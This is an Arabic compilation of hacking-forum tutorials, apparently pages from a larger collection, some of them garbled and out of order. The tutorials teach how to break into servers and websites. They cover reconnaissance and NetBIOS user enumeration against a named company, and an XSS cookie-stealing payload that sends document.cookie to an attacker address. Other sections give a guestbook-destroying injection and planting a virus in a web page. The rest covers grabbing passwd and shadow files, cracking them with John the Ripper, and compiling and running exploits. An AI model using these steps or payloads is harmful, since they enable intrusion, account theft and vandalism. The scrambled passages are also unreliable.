‫فيه طرق معروفه تمكنك من الدخول ولو بنسبه ‪ %50‬على اغلب السيرفرات الموجوده بالعالم لحظ ‪%50‬‬
‫اول الجهمات الولى دائمايكون الغرض منها تكوين معلومات عامه عن السيرفر الذي يراد مهاجمتته ومن‬
‫هنا نبدا الهجوم وعلى اي اساس يتركز الهجوم‬
‫احيانا يكون هجوم حرمان خدمه واحيانا هجوم اقتحام كامل حسب الموجود والمتوفر والمعلومات الموجوده‬
‫لدينا‬
‫طيب لنفرض اننا ودنا نخش على شركه معينه باسم ‪ aswind.COM‬الخطوه الولى هي التعرف على مدى‬
‫عنوان ‪ ip‬الخاصه بهذه الشركه وهذا سهل‬
‫اول شي انصح بالتسجيل في موقع ‪INTERNIC.NET‬‬
‫حتى يعطونك خدمات تستاهل‬
‫هناك طريقتين لمعرفه الي بي اول‬
‫عن طريق الموقع ‪INTERNIC.NET‬‬
‫والثانيه عن طريق برنامج الدوس بالمر ‪:‬‬
‫‪NSLOOKUP‬‬
‫‪SET TYPE = ALL‬‬
‫‪aswind.COM‬‬
‫راح تطلعلك المعلومات هذي بالضبط ‪:‬‬
‫‪Domain Name: ASWIND.COM‬‬
‫‪264‬‬

‫‪.Registrar: ONLINENIC, INC‬‬
‫‪Whois Server: whois.OnlineNIC.com‬‬
‫‪/Referral URL: http://www.onlinenic.com‬‬
‫‪Name Server: DNS.ASWIND.COM‬‬
‫‪Name Server: NS1.ASWIND.COM‬‬
‫‪Updated Date: 01-apr-2002‬‬
‫معنا الكلم هذا ان شركه ‪ aswind.com‬وضعت ارقام الملقامات الخاصه ب ‪DNS = 2‬‬
‫يعني عدد ‪ 2‬خادم ‪ DNS‬وسوت لها نشر يعني هناك على القل سيرفرين شغالين بخدمه ‪ DNS‬يعني هم‬
‫يتعتقدون ان الموضوع ماراح ياخذ كثير من طاقه التشغيل للجهزه خاصه ‪DNS‬‬
‫هنا في مجال للدخول وتعديل بيانات ‪ DNS‬بمعنى ان العمليه تصير واسعه شوي‬
‫فقط قم بنشر عنوانين من عنواوين ‪ Ip‬فقط مثل ماسوو ‪ aswind.com‬لكن لنفترض انه فيه اكثر من‬
‫عنوان لنفول ‪ 6‬مثل ‪.‬‬
‫عشان كذا اقترح على الشركات وضع عنواونين ‪ IP‬للنشر ووضع خوادم ‪ DNS‬على اجهزه قديمه وبطيئه‬
‫لنك اساسا في حاجه ل ‪ DNS‬دايناميكي وهذا يعني انك تقوم بتشغيل ‪ WIN2K‬وخدمه ‪ DNS‬على جهاز‬
‫واحد وهذي من الفكار الجيده في نظري اذا وضعت جهاز خاص فقط بال ‪DNS‬‬
‫طيب لنفرض انك مالقيت شي على اجهزه ‪ DNS‬وبما انك في بدايه هجوم هذا يعني انه عندك متسع من‬
‫الوقت اذن قم بتجريب جميع العناوين المتوفره لديك والتي حصلت عليها من ‪ HowIS‬وصدقوني فيه ادوات‬
‫موجوده بالنت مممكن انها تمسح مجموعه ‪ IP‬موجوده في شبكه معينه‬
‫طيب قم بعمل ملف اسمه ‪ LMHOSTS‬يوجود فيه اسم ‪ NetBios‬لكل عنوان ‪ IP‬استطعت انك تحصل‬
‫عليه‬
‫يعني انت عرفت ان الشبكه من كلس ‪ C‬وعنوانها ‪ 200.200.200.0‬سو لك ملف ‪ LMHOSTS‬باسم‬
‫‪ NetBios‬وملف باسم ‪ N2 = 200.200.200.2‬وهكذا بعدين تحتاج عمل ‪Net view‬‬
‫‪ //servername‬لكل اسم من ‪ N1‬إلى ‪ N254‬يعني كانك تسوي سكان بورت بس بطريقه ثانيه‬
‫من جهاز رقم ‪ 1‬إلى جهاز رقم ‪254‬‬
‫وبالنسبه للجهزه الصحيحه سوف تشتغل الخدمه فيها ام العناوين الغير متصله فلن تستجيب طبعًا‬
‫طيب انت ال الن ماتقدر تسوي شي \‬
‫بس تقدر تتاكد من حساب ‪ Administrator‬موجود وال ل او تم تغييره او اذا هناك يوزر نيم بنفس‬
‫الصلحيات انت بطبيعه الحال ماتقدر تحصل عليه بسهوله‬
‫اذن هناك ابواب خلفيه للحصول عليه من بعض الطرق الوصول لبعض اسماء المستخدمين الموجودين في‬
‫الشركه وهذا يعتبر عيب من عيون ‪ Windwos‬لنها تطنشهم ههههههههه مدري ليش‬
‫فيه امر تقدر تعرف من خلله بس أل الن انت ماتقدر تسويه لنه مالك حق وصول مباشر يعني انت لزم‬
‫تحصل على ‪ username and password‬لي يوزر موجود في المجال المر هو ‪ net user‬وهو‬
‫يستعرضلك جميع المستخدمين الموجودين بالمجال‬
‫لكن فيه طريقه للحصول على اسماء بالهبل ههههههه‬
‫كيف ؟؟‬
‫الن عندما يقوم مستخدم بتسجيل دخول يقوم جهازه ليس فقط بتسجيل اسمه فقط بل اسم جهازه يعني على‬
‫سبيل المثال مدير الشبكه اذا صار عنده زحمه يشغل خدمه اسمها مراقبه النظام حتى يعرف انه وصل للحد‬
‫القصى‬
‫عندما يقوم مستخدم بتسجيل الدخول تقوم خدمه ‪ Messenger Service‬بتسجيل اسم المستخدم كاحد‬
‫اسماء ‪ NetBios‬الموجودين في الشبكه الي انت اساسا جالس تبحث عنهم وعلى افتراض انك دخلت على‬
‫خادم بعنوان ‪ IP 200.200.200.200‬فأن اي شخص اذا قام بعمل ‪nbtstat -a 200.200.200.200‬‬
‫سيتكمن من معرفه اسم جهازك واسم المستخدم واذا كان جهازك ‪ MSBROWSER‬او ل ) سوف اتحدث‬
‫عنها بالتفصيل (‬
‫طيب لنفرض ان فيه شخص باسم ‪ John‬ورقم ‪IP 200.200.200.50‬موجود في الشبكه فانك اذا قمت‬
‫بعمل ‪ Nbtstat -a 200.200.200.50‬راح يضهرلك انه فيه شخص باسم ‪ john‬واسم جهازه‬

‫‪265‬‬

‫‪johnPC‬‬
‫الن موجود معك اسم مستخدم ) احتمال يكون ‪( Administrator‬طيب وش نسوي‬
‫؟‬
‫قوم بتعطيل خدمه ‪ Messenger Service‬في جهزك ) ولن يتم تسجيل اسمك في النطاق يعني بتخش‬
‫مخفي (‬
‫وبالسنبه ل ‪ MSBROWSER‬اذا شفتها بعد عمل المر ‪nbtstat -a‬‬
‫هذا يعني انه استعراض رئيسي للمجال وهذا من اكبر الخطاء التي يقومون بها مدراء الشبكات لن مراقب‬
‫المجال يدوخ ل يستطيع التجميع وتستطيع استغلل مثل هذه الثغرات دائما في الشبكات الداخليه‬
‫طيب انت الن حصلت على اسم المتسخدم‬
‫انت محتاج كلمه المرور وهذي هي المشكله يعني انت ضميت جهازك مع الشبكه لكن ماقدرت تحصل على‬
‫كلمه المرور لكن تقدر تحصل عليها ‪ nt senstiver‬او متحسس الشبكه ) معليش ماني متاكد من السبيلنق‬
‫(‪.‬‬
‫طيب كيف اقدر احصل فعليا على كلمه المرور‬
‫غالبا ماتكون كلمات مرور المستخدمين تاففه جدا هاذ اذا وجدت اصل‬
‫يعني برنامج مثل ‪ l0pthcrack‬يحل لك المشكله‪.‬‬
‫انتهى‪،،،‬‬

‫‪266‬‬

‫" ‪" Cross Site Scripting‬‬
‫>منقول من منتدى الحلم<‬
‫>الكاتب‪<tcp :‬‬
‫المتطلبات ‪:‬‬
‫معرفة تامه بلغة ‪HTML‬‬
‫اطلع غير متعمق على لغات السكربتينق وهي ‪JAVASCRIPT ,PERL ,CGI ,VBSCRIPT‬‬
‫ومن وجهة نظر شخصية المصايب كلها من الجافا سكربت والهتمل‬
‫===========================================================‬
‫====================================‬
‫الهداف المنشوده ‪:‬‬
‫* افهام القارئ عن الكيفية التى يتم فيها سرقة معلومات هامه من جهاز المستخدم‬
‫* اختراق المنتديات من نوع ‪ VBULLETIN‬او ‪ YaBB and UBB‬او المجلت من البهب نيوك او‬
‫بوست نيوك‬
‫*افهام القراء عن الكيفية التي تتم فيها سرقة الكوكيز او اختطاف الجلسة من المستخدمين‬
‫* ان يستطيع القارئ توسيع مداخل الختراق‬
‫===========================================================‬
‫=====================================‬
‫جمله عرضية ‪:‬‬
‫الختراق ليس ال تشغيل للمخ واستغلل لشياء لها فائده وارجو من يقرا هذا الموضوع بان يحاول التعود‬
‫على مسألة القراءة والترجمه ثم يلجأ الى التطوير ويترك عنه مسألة المطامر من منتدى لمنتدى او‬
‫‪267‬‬

‫المواقع التي تطرح الثغرات المنية ‪...‬هل نحتاج الى امة تطور نفسها ‪ ..‬ام نطور انفسنا نحو المية‬
‫===========================================================‬
‫=====================================‬
‫المشكلة ‪:‬‬
‫كما هو معروف فان مستعرضات الوب مثل الكسبلورر او نت سكيب ‪ ...‬الخ تاتي مترجمات النصوص او‬
‫السكربتات‬
‫مبنية داخلها ويتم ترجمة السكربتات على جهاز المستخدم فلو اننا طلبنا صفحة كان بها سكربت معين‬
‫فان المستعرض يترجم هذا السكربت ويظهره على نفس الصفحه المطلوبه ‪.‬‬
‫اما بالنسبة للمنديات او مجموعات النقاش فانها ترفض مثل هذه السكربتات وتعتبرها خرق للخصوصية‬
‫او قد تستغل في اغراض سيئة لسرقة معلومات حساسة من المستخدمين‬
‫المثال التالي يوضح كيفية ادراج السكربت ‪:‬‬
‫‪.Hello FOLKS board. This is a message‬‬
‫>‪<SCRIPT>malicious code</SCRIPT‬‬
‫‪.This is the end of my message‬‬
‫ان كلمة ‪ malicious code‬تم ادرجها او حقنها في بين علمتي السكربت وقد تحتوي على كود خبيث‬
‫يسرق او يرسل بيانات ‪ ...‬الخ لذلك فان مصمموا برامج المنتديات ومطوروا يمنعونها ال اذا مكنها الدمن‬
‫او المصمم او قد يتم استخدامها اذا مكن المنتدى تفيل ‪ HTML‬مثل يتم ادراج السكربت مكان خاصية المج‬
‫>‪script>document.write('<img‬‬
‫‪<src="http://my_ip_address/'+document.cookie+'">';</script‬‬
‫او قد يستطيع السكربت ان يكتب على شكل رابط في صفحة او يرسل لك بالبريد او يرسل لك عن طريق‬
‫المسنجر‬
‫والمثال التالي يوضح لك كيفية عمل رابط في صفحة‬
‫>?‪A HREF="http://example.com/comment.cgi‬‬
‫‪<mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A‬‬
‫انظر هنا وركز في كيفية عمل الكود انها فقط عندما يصلك باحد الطرق المذكوره اعله وتضغط عليه سينفذ‬
‫السكربت‬
‫وللشرح اكثر لنفرض ان السكربت ‪ comment.cgi‬سكربت يرسل ملحظاتك لصاحب الموقع او قد يكون‬
‫سكربت للبحث‬

‫‪268‬‬

html‬‬ ‫‪http://www.cert.com/pub/a/2002/02/20/css.html‬‬ ‫‪269‬‬ .org/advisories/CA-2000-02. <APPLET>. and <EMBED‬‬ ‫ومن الممكن ان يكون هناك وسم النماذج >‪ <form‬من وسوم ‪ HTML‬وبنفس الفكار السابقة يمكن تنفيذ‬ ‫الوامر‬ ‫منها لسرقة الكوكيز او بيانات اخرى او توجيهك لصفحات اخرى‬ ‫اذا كنت قرات ماكتبته عن التكويد السداسي عشر واليونيكود تستطيع الن ان تفهم ما اقصده‬ ‫=========================================================‬ ‫ولمزيد من التفاصيل ‪:‬‬ ‫‪http://www.‬‬ ‫وحتى اعقد المور اكثر‬ ‫لحظ المثال التالي ‪:‬‬ ‫>‪A HREF="http://example.cgi? mycomment=<SCRIPT‬‬ ‫‪<SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A‬‬ ‫هنا استخدم نفس السكربت السابق لكن هذه المره طوره اكثر ليكون مستخدما في ادراج ملف من موقع اخر‬ ‫والذي‬ ‫هو بالسم ‪ BADFILE‬ولن مصدر البيانات ادخل فيه عدة مصادر اخرى عن طريق السكربت المذكور فأن‬ ‫هذا الهجوم‬ ‫يسمى ب ‪ cross-site scripting‬او الترجمه من عندي " برمجة عبور الموقع " لننا عبرنا باستخدام‬ ‫برمجة‬ ‫السكربتات اكثر من موقع واذا كنت تلحظ في السيكيورتي فوكس او المواقع المنيه تختصر ب ‪ CSS‬وهي‬ ‫اختصار‬ ‫ل ‪ cross-site scripting‬وليس ل ‪ CASCADE style sheets‬اي اوراق النماط المتتالية‬ ‫قد يدخل بدل الوسم او علمة السكربت اي من الوسوم التالية‬ ‫>‪<SCRIPT>.perl.‫في الموقع او المنتدى وهو يحتوي على متغير داخله اسمه ‪ mycomment‬ياخذ المدخلت او الملحظات‬ ‫التي تكتبها‬ ‫فلو اعتبرناه انه سكربت بحث ويولد صفحات ديناميكية ناتجه من البحث ستكون النتائج وخيمة فبدل ان‬ ‫ينتج الصفحات الحيوية او النشطه سينتج مايطلبه السكربت منه لحظ الفكره هنا فقد ضمن السكربت داخل‬ ‫حقل نصي فبدل من ان ياخذ الحقل النصي نصوص استخدم ليأخذ اوامر من السكربت ‪.com/comment. <OBJECT>.

..‬‬ ‫‪.‫انتهى‪،،،‬‬ ‫" كود تدمير سجل الزوار "‬ ‫>ةةةةة ةة ةةةةةةة ةةةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةةة<‬ ‫كود صغير جدا بحجمه‪.‬‬ ‫‪.‬‬ ‫‪.‬‬ ‫‪....‬‬ ‫‪...‬والنقطه المهمه وهي‬ ‫كتابة تعليقك على الموقع؟؟؟؟؟؟؟‬ ‫نحن سوف نضع كل شي حسب ما هو مطلوب ولكن عندما نأتي لكتابة التعليق‪.‬‬ ‫‪.‬‬ ‫‪.....‬‬ ‫‪.‬‬ ‫‪.‬انتم تعرفون طبعا كيفية عمل توقيع في‬ ‫سجل الزوار‪.‬‬ ‫هذا هو الكود ‪:‬‬ ‫==================================================‬ ‫=‬ ‫‪--><h3>put your text here<xmp><plaintext‬‬ ‫==================================================‬ ‫‪270‬‬ ...‬كبير بقدرته على تدمير سجل الزوار بالكامل‪..‬نقف ونكتب‪:‬‬ ‫‪...‬‬ ‫‪.‬السم‪ -‬اليميل‪ -‬موقعك الشخصي‪-‬تقديرك للموقع‪ -‬طريقة الستدلل‪.‬‬ ‫‪..‬‬ ‫‪.

‬بعد توقيعك اعمل‬ ‫ريفريش وانظر ماذا حصل‬ ‫ملحظه‪:‬‬ ‫=====‬ ‫الكود ل يعمل مع بعض انواع سجل الزوار؟!‬ ‫انتهى‪،،،‬‬ ‫" وضع فايروس في صفحة "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪<Dr^FunnY :‬‬ ‫اختار صفحة جديدة ‪ ..‬انت عليك تحط في المربع‬ ‫ده كود الفيرس وتضغط موافق ‪ (:‬وكده الطبخة استوت ‪...‬‬ ‫واوعى تضغط على معاينة الصفة وانت معندكش نورتن لكن لو عندك هايديك تحذير بوجود فيروس‬ ‫الطريقه للي عنده فرونت بيج عربي واللي عنده انجليزي هي نفس الخطوات مع تغيير السامي‪.. "HTML‬هايفتحلك مربع تاني‪ .. put your text here‬وهذا كل شي ‪.‬خليك في الخانة الولى اللي على اليمين‬ ‫واختار منها ااخر اختيار اللي هو "عناصر تحكم متقدمة" اضغط ضغطه واحده وهايظهرلك عناصر في الخانه‬ ‫اللي على اليسار اختار اول اختيار اللي هو "‪ .‬هايطلعلك جدول صغير من خانتين ‪ .....‬‬ ‫انتهى‪،،،‬‬ ‫‪271‬‬ ..‬هاتلقي تحت ثلث مربعات الول عادي والثاني ‪ html‬والثالث معاينة‬ ‫انت خليك في العادي‬ ‫اختار ادراج‬ ‫ثم اختار مكون ويب‪ ..‫يمكنك كتابة اي شي تريد في مكان ‪........

packetstorm.‬‬ ‫‪ -2‬معرفة نظام تشغيل الموقع ويندوز أم لينوكس وغيرها والفائدة من ذلك أن كل نظام له ثغراته الخاصة به‬ ‫واسم المجلد الذي به ملف الباسوورد يختلف من نظام تشغيل لخر‪..com‬‬ ‫‪272‬‬ .netcraft.‬إلخ‬ ‫أول يجب أن تجمع كل المعلومات الممكنة حول الموقع ‪:‬‬ ‫‪ -1‬المنافذ المفتوحة مثل الف تي بي والتلنت مثل وهذ عن طريق برامج مثل‬ ‫‪super scan‬‬ ‫ابحث عنه في النترنت‪.f2s.‬‬ ‫ويمكن استخدامها في لينوكس أو في ويندوز إذا كان لديك برنامج‬ ‫‪Active Perl‬‬ ‫ثغرات بلغة سي‬ ‫*‪ c.!!.com‬‬ ‫‪www.net‬‬ ‫واكتب الموقع ثم إنتر‪ !.‬إلخ‬ ‫‪ -3‬معرفة كل مايقدمه الموقع من خدمات كالبريد وغير ذلك‬ ‫‪ -4‬معرفة البرامج المثبتة على الموقع مثل المنتديات وبرامج السي جي آي‬ ‫أنواع الثغرات‬ ‫أبسط النواع هي التي يمكن الوصول إليها عن طريق المتصفح مثل‬ ‫‪/.../www.ukrt...‬ويمكن استثمارها في لينوكس فقط‬ ‫ويمكنك إيجاد الكثير من النواع السابقة الخاصة بلينوكس فيمواقع الثغرات وإليك بعضها‬ ‫‪www..securityfocus.‫" الثغرااات "‬ ‫>ةةةةة ةة ةةةة ةةةةةة<‬ ‫‪ = Exploit‬اسثمار = ثغرة‬ ‫الجزء المهم‪:‬‬ ‫الثغرات هي أخطاء برمجية في نظام التشغيل ويمكنك استغللها للحصول على ملف الباسوورد وقاعدة‬ ‫البيانات وووو‪.‬‬ ‫لمعرفة نظام التشغيل إذهب إلى الموقع‬ ‫‪www.‬وستعرف بعض المعلومات عن الموقع كليبي ونظام التشغيل‪.securify.ussrback.com‬‬ ‫‪www..thesite.com‬‬ ‫‪www.securiteam...com‬‬ ‫والنواع الباقية أو الستثمارات ‪:‬‬ ‫ثغرات مكتوبة بلغة بيرل *‪pl.‬يمكن استخدامها في لينوكس فقط‬ ‫ثغرات بلغة شل‬ ‫*‪sh.com‬‬ ‫‪www.

.passwd or /etc/shadow‬والجديد هو ‪x‬‬ ‫‪token‬‬ ‫‪IRIX : /etc/shadow‬‬ ‫‪token = x‬‬ ‫‪! = AIX : /etc/security/passwd‬‬ ‫‪token‬‬ ‫‪* = ConvexOS : /etc/shadow or /etc/shadpw‬‬ ‫‪token‬‬ ‫مثال لملف شادو‬ ‫‪::::::root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445‬‬ ‫‪adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::‬‬ ‫‪::::::lp:NP:6445‬‬ ‫نجد أن كلمة السر هي‬ ‫‪EpGw4GekZ1B9U‬‬ ‫كيف تفك التشفير؟‬ ‫عن طريق برامج مخصصة لذلك أفضلها تجده في صفحة برامج الثغرات‬ ‫‪John the ripper‬‬ ‫وهو يقوم بتجريب كل المحاولت الممكنة حتى يحصل على الباسوورد ‪.com‬‬ ‫‪www.‬‬ ‫أما المشفرة والتي سنحصل عليها تكون هكذا‪:‬‬ ‫مضللة ‪root:x:0:1:Super-User:/:/sbin/sh‬‬ ‫مشفرة ‪root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh‬‬ ‫‪ = root‬أو الجذر اسم المستخدم‬ ‫‪ = x‬كلمةالسر ولكنها مضللة‬ ‫وباقي السطر غير مهم‬ ‫في الغلب ستكون كلمة السر مضللة ‪ shadowed‬لذا عليك أن تبحث عن ملف آخر يحوي كلمة السر‬ ‫مشفرة يسمى ملف الشادو‬ ‫‪shadow file‬‬ ‫ويوجد في أماكن معينة تختلف باختلف نظام التشغيل‬ ‫‪ = token‬الرمز الذي يعبر عن الباسوورد‬ ‫‪* = Linux : /etc/shadow‬‬ ‫‪token‬‬ ‫‪ = SunOS : /etc/shadow‬يأخذ أشكال متعدده اشهرها هو *‬ ‫‪token‬‬ ‫‪ * = FreeBSD : /etc/master..‫‪www.‬المشكلة أن كلمةالسر تكون بداخله مضللة ‪shadowed‬‬ ‫أو مشفرة ‪.‬‬ ‫ولكن يجب أن تضع له الباسووردات في ملف مفكرة مثل وعليك وضع الكلمة المشفرة بدل من ال ‪ x‬وعليك‬ ‫ترتيبها بحيث يكون كل حساب في سطر‬ ‫طريقة تشغيله‪:‬‬ ‫إذهب إلى الدوس واكتب‬ ‫‪john passwd‬‬ ‫حيث ‪ passwd‬هو الملف الذي به الباسوورد المشفرة وضعتها‬ ‫‪273‬‬ .secureroot.encryption‬‬ ‫مثال لملف باسوورد‬ ‫‪root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫ولن ملف الباسوورد يحتوي على كلمات سر الشخاص المرخص لهم بدخول الموقع قد ل بزيد عن عشرة‬ ‫أسطر وقد يصل آلف السطر‪.‬‬ ‫ويمكنك من خلل البرامج الموجودة على السيرفر كالمنتديات أو برمجيات بيرل وسيجي آي أن تبحث عن‬ ‫ثغرات لها في مواقع الثغرات أو المواقع السابقة‪..rootshell.‬‬ ‫كلمات السر السابقة مضللة وهي علمة ‪x‬وقد تختلف‪.‬وبرمجيات بيرل وسي جي آي قد تكون كتاب زوار أو محرك‬ ‫بحث أو حتى عداد زوار‬ ‫حسنا لنفرض أنك حصلت على ملف الباسوورد‪..com‬‬ ‫أما ثغرات المتصفح يمكنك الكشف عنها بالبرامج الموجودة في قسم البرامج‪.

.‬‬ ‫و يوجد ايضا الثغرات التي تتيح لك تنفيذ بعض الوامر مثل عرض و مسح و الكتايه على الملفات‬ ‫مث الكستينشنز و غيرها ‪. OFFLINE‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××××××××××‬ ‫‪ 1‬كيف تجد استثمارات ؟‬ ‫لكي تستطيع ان تستثمر ثغره معينه في سيرفير فانه يجب عليك اول ان تتاكد ان الثغره موجوده في السيرفير‬ ‫و لما كان الستثمار عباره عن فايل معين ‪..‬يو جد العديد من الستثمارات مثل‬ ‫‪. (BOF (buffer over flow) ..‬‬ ‫لذلك نستخدم ‪ scanner‬لبحث عن هذا الستثمار ‪.‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××‬ ‫‪: a face at the interface‬‬ ‫الستثمارات تستخدم عاده لكي تحصل عل الرووت عل نظام معين ‪.. DoS ( denial of service‬‬ ‫و على فكره انا ا اؤمن ان ال هجوم ال ‪ DoS‬هي اكسبلويت ‪....John the Ripper Version 1..‬بالنسبه لموضوع البوفر اوفر فلو فهو يشبه الى حد كبير‬ ‫ال ‪ DoS‬حيث يعتمد على ارباك السيرفير بفيض من المعلومات و يمنحك الرووت ‪.‬طبعا من المعروف ان ثغرات المتصفح لها سكانرز ال‬ ‫‪threads‬‬ ‫و هي تسمى ال ‪ cgi scaners‬بعضها ممكن ان تضيف له ملفات بها ثغرات و البعض الخر يكون‬ ‫جاهزا ‪.‬‬ ‫اما عن طريق التطبيق مباشره من خلل المتصفح كما في حاله بعض ثغرات امتصفح مثل اليونيكود او‬ ‫الفرونت بيج‬ ‫او ان تستخدم السكانرز في فحص الموقع ‪...‫سيظهر ‪:‬‬ ‫‪by Sola 97....3 Copyright (c) 1996‬‬ ‫‪Loaded 1 password‬‬ ‫**‪v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE‬‬ ‫وإذا أردت معرفة الباسوورد التي يخمنها الن اضغط انتر‬ ‫والباسوورد الصحيحة ستحفظ في ملف في نفس المجلد الذي به البرنامج اسمه‬ ‫‪john.pot‬‬ ‫وإذا أردت القيام بعملية كسر أخرى عليك إلغاء الملف أو تغيير اسمه ‪.‬‬ ‫‪274‬‬ ..‬‬ ‫‪ 4‬مواقع مفيده للبحث عل الثغرات ‪.‬الستثمارات دايما ما توجد‬ ‫بواسطه ملف معين يجعك تستطيع الدخول بواسطه ال ‪ http‬بصوره طبيعبه ‪..‬فانه يوجد طريقتين لمعرفه ما اذا كانت الثغره موجوده ام ل‪.....‬‬ ‫اما هجوم ال ‪ DoS‬فهو عباره عن ارسال ‪ GET / POST‬ال السيرفير مما يؤدي ال‬ ‫حدوث ‪ OVERLOAD‬لوحده المعالجه المركزيه للسيرفير )اللي هو عباره عن جهاز يعمل‬ ‫‪ 24‬ساعه ( فيتوقف الموقع عن العمل و يصبح السيرفير ‪..‬‬ ‫انتهى‪،،،‬‬ ‫" شرح شبه مفصل عن الثغرات "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< icer :‬‬ ‫الموضوع اليوم ينقسم الى التالي ‪:‬‬ ‫‪ 1‬كيف تجد اكسبلويتات ؟‬ ‫‪2‬كيف تستعمل الكسبلويتات ) دعونا نسميها استثمارات ( ؟‬ ‫‪ 3‬انواع مختلفه من الستثمارات ‪..‬و الرووت هو عباره‬ ‫عن الدمينيستراتور او مدير النظام الذي تريد اختراقه ‪...

.securityfocus...‬‬ ‫لو انت بتستعمل الشادو حتلقي ‪ url‬بجانب الثغره ‪.‬‬ ‫و كيف تستخدمها و اشياء زي كده ‪.‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××××××××××××××‬ ‫‪ 4‬مواقع مفيده للبحث عن الثغرات من خللها ‪:‬‬ ‫يمكنك البحث عن الستثمارات الجديده في هذه المواقع ‪:‬‬ ‫‪packetstorm..rootshell..com‬و هو‬ ‫يحتوي على‬ ‫محرك بحث يكفي ان تضع مفتاح للبحث عباره عن كلمه واحده او كلمتان مثل ‪ red hat 7.com‬‬ ‫و تكتب في محرك البحث اسم الثغره و انت ان شاء ال في ‪ %99‬من الحالت بتلقي استثمار لهاي الثغره‪.‬تزرو العنوان ده و تقره كل كلمه تلقيها هناك ‪......com /www.(:‬‬ ‫انتهى‪،،،‬‬ ‫‪275‬‬ ..‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫×××××××××××××××××××××××××××××××××‬ ‫‪ 3‬انواع مختلفه من الستثمارات ‪:‬‬ ‫طبعا الكثير من الستثمارات يكون هدفها هو منحك الرووت على السيرفير ‪....‬فهي قد تعطي لك صلحيه قراءه و حذف و الكتابه عل الملفات و ايضا‬ ‫رفع ملفات الى السيرفير ‪..‬‬ ‫او اذا لم تجد اي ‪ url‬في السكانرز الخرى يبقى تاخد اسم اثغره و تروح الموقع ‪rootshell.insecure.securify.2‬و سوف تجد‬ ‫العديد من الثغرات التي تحتوي على‬ ‫‪...org‬‬ ‫‪ /www...‬‬ ‫بالنسبه للبفر اوفر فلو فهو يشبه الى حد كبير هجوم ال ‪ DoS‬و لكنه ل يسبب ضرر للسيرفير مثلما يسببه‬ ‫هجوم ال ‪ DoS‬المهم انه في اغلب الحيان يكون البفر عباره عن ارسال اوامر للسيرفير تنتهي دائما‬ ‫باعطائك‬ ‫صلحيه الرووت ‪ ... http‬و ال ‪ BOF‬و‬ ‫غيرها ‪....2‬‬ ‫××××××××××××××××××××××××××××××××××××××××××××××××××‬ ‫××××××××××××××××××××××××××××××××××‬ ‫‪ 2‬كيف تستغل هذه الثغرات ؟؟‬ ‫الكثير من الناس عندما يفحصون موقع بسكانر )و خاصه ال ‪ ( shadow‬و يطلع لهم استثمارات معينه ‪...‬‬ ‫‪...‬اي لك كل الصلحيات على‬ ‫السيرفير‬ ‫و الحصول على الرووت يمكن ان يتم من خلل العديد من الثغرات مثل ثغرات ال ‪ .‬ل يوجد اي قيود على ال ‪ commands‬اللي الرووت يكتبها ‪.‬معنى كلمه رووت هو المدير‬ ‫او الدمين ‪ . etc/passwd/‬في انظمه اليونيكس ‪..com /.....com‬و غيرها ابحث سوف تجد المزيد ‪..‬على فكره من احسن المواقع التي يمكن ان تجد بها احدث الثغرات هو ‪ rootshell.‬‬ ‫كها تعتمد على طريقه عمل الثغرات ‪ .‬ل‬ ‫يعرفون ايش يسوون‬ ‫بعد كذا؟؟؟؟‪.‬‬ ‫او قد تعطي لك الكلمه السريه و اسم اليوزر اما في صوره واضحه مثل الملف ‪ config..‫و هناك نوع اخر من السكانرز و ان احبذه ‪<<< shadow security scaner. red hat 7.....inc‬او مشفره‬ ‫بمقياس‬ ‫‪ ..‬و هذا بسبب استقبال السيرفير لكم هائل من الداتا فيؤدي الى ارباك السيرفير ‪.. DES/MD5‬كما في الملف ‪ .

‫" كيف تستخدم الثغرات "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪<oOoDa BE$T :‬‬ ‫البداية‪:‬‬ ‫‪txt.xxx/.‬‬ ‫‪c.out xxx.‬هذا يفترض عليك‬ ‫عليك تحميله ثم عمل )‪_ (compile‬وهذا يعني تحويل السورس كود لملف )برنامج(_ ثم تثوم‬ ‫بتشغيله‪.. :‬‬ ‫برنامج بيرل‪.‬اكمل القراءة لتعرف كيفية استخدامها‪.‬لكن المشكلة هنا انه لن يمكن تشغيلها تحت بيئة ويندوز‪..‬فيجب ان يكون عندك ‪ Linux‬او‬ ‫‪.‬لتشغيله ايضا تحتاج ‪ Linux‬او ‪Shell Account‬‬ ‫اذا كان ‪ exploit‬واردت ان تطبقه على موقع اكتب‪:‬‬ ‫‪perl filename..a.pl xxx.‬‬ ‫والن ماذا ينقصك؟؟‬ ‫يجب ان يكون معك اي بي او اسم الموقع الذي تريد ان تطبق عليه الثغرة‪.xxx.‬واغلب الثغرات يتم كتابتها بالسي‪..xxx‬‬ ‫او‬ ‫‪filename xxx.‬البير‪. Shell Account‬‬ ‫بعض التحميل توجه للمسار الموجود به المفل ثم اكتب‪:‬‬ ‫‪ >---.gcc filenmae.xxx.‬من الممكن اي يحتوي على سورس كود لبعض الثغرات او البرامج المكتوبة بالسي‬ ‫‪ .c‬امر الكومبايل‬ ‫سينتج الملف‪:‬‬ ‫‪ >--.xxx..xxx/.out‬وهو البرنامج الناتج‪.‬‬ ‫‪276‬‬ .. :‬‬ ‫ويعني ملف ملف نصي‪.xxx.. :‬‬ ‫هو برنامج سي لكنه سورس كود فقط‪.‬‬ ‫للثغرات 